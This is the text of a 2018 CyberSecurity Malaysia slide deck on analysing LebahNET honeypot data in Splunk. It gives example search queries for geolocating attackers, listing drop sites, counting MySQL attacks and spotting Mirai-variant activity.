More Related Content
Similar to Splunking Lebahnet (20)
Splunking Lebahnet
- 1. Copyright © 2018 CyberSecurity Malaysia
Copyright © 2018 CyberSecurity Malaysia
SPLUNKING
LEBAHNET
(HONEYNET)
- 2. Copyright © 2018 CyberSecurity Malaysia
Content
• Background
• Problem
• Architecture Design
• Case Study
• Moving Forward
2
- 3. Copyright © 2018 CyberSecurity Malaysia
/usr/bin/whoami
Zuhair
• Executive turned Analyst
(recently) at MyCERT.
• Working on Mobile Threat
Research.
• Also happen to “play” with
honeypot technology.
Fathi Kamil @ Fatah
• Acting Manager at Cyber Threat
Research Center, MyCERT.
• Technical Lead for Malware
Mitigation WG
• LebahNET Honeypot Project
• Coordinated Malware
Eradication and Remediation
Platform.
- 4. Copyright © 2018 CyberSecurity Malaysia
Background
LebahNET - MyCERT’s Honeypot project - to study on how
exploits function as well as to collect malware binaries.
Honeypot is a computer software mechanism setup to mimic a
legitimate site to lure malicious software into believing the
system is a legitimate site, vulnerable for attacks.
Honeypot allow researchers to detect, monitor and
counterattack malicious activity by understanding the activities
during intrusion phase and from the payload attack.
4
- 6. Copyright © 2018 CyberSecurity Malaysia
Problem Statement
• Tons of fixed structure data – Important data is not
represented as an attribute
6
- 7. Copyright © 2018 CyberSecurity Malaysia
What We Do?
• In short, throw everything in Splunk.
• Make query and show what actually in it.
7
- 10. Copyright © 2018 CyberSecurity Malaysia
Case Study
• Enrich IP to Geolocation directly
– sensor.protocol=httpd AND metadata.http_method=GET | rex
field=metadata.url_path "http(s)*://(?<domain>[^/]+)/[^?s]+" |
iplocation domain | top Country
10
- 11. Copyright © 2018 CyberSecurity Malaysia
Case Study
• Extract list of drop site URI, POST_DATA
– host=lebahnetv2 AND sensor.protocol=httpd AND
metadata.http_method=POST AND metadata.headers.Host=*| top
limit=20 "metadata.headers.Host"
11
- 12. Copyright © 2018 CyberSecurity Malaysia
Case Study
• Top MySQL attack by country
– attack_type=mysqlcmd AND sys_eval AND http | rex field=metadata.args
"http(s)*://(?<domain>[^/]+)/[^?s]+" | iplocation domain | top Country
12
- 14. Copyright © 2018 CyberSecurity Malaysia
Binary Collected
• attack_type=fileupload | timechart count by metadata.md5
usenull=f useother=f
14
- 15. Copyright © 2018 CyberSecurity Malaysia
IOT – Mirai Variant
15
Search for keyword “Shinka”
in your honeypot data!
- 16. Copyright © 2018 CyberSecurity Malaysia
Mirai
variant
• shinka AND metadata.http_method=GET | rex
field=metadata.url_path "http(s)*://(?<domain>[^/]+)/[^?s]+" |
iplocation domain | top Country
16
- 17. Copyright © 2018 CyberSecurity Malaysia
IOT – Mirai Variant
Search for keyword “ecchi”
17
- 18. Copyright © 2018 CyberSecurity Malaysia
Caveat
• Splunk does not “Auto-magically” solve your data
correlation problem.
18
- 19. Copyright © 2018 CyberSecurity Malaysia
What is Next after Splunk
• Continue paying the license if still affordable or…
• …Go for ELK
• More detail analysis on LebahNET data.
– Better statistic to show attacks
– Extract more information from the metadata
19
- 20. Copyright © 2018 CyberSecurity Malaysia
LebahNET Participation
• Part of Malware Mitigation Working Group in APCERT.
20
- 21. Copyright © 2018 CyberSecurity Malaysia
Copyright © 2018 CyberSecurity Malaysia 21
Editor's Notes
- Dionaea, cowrie, glastoph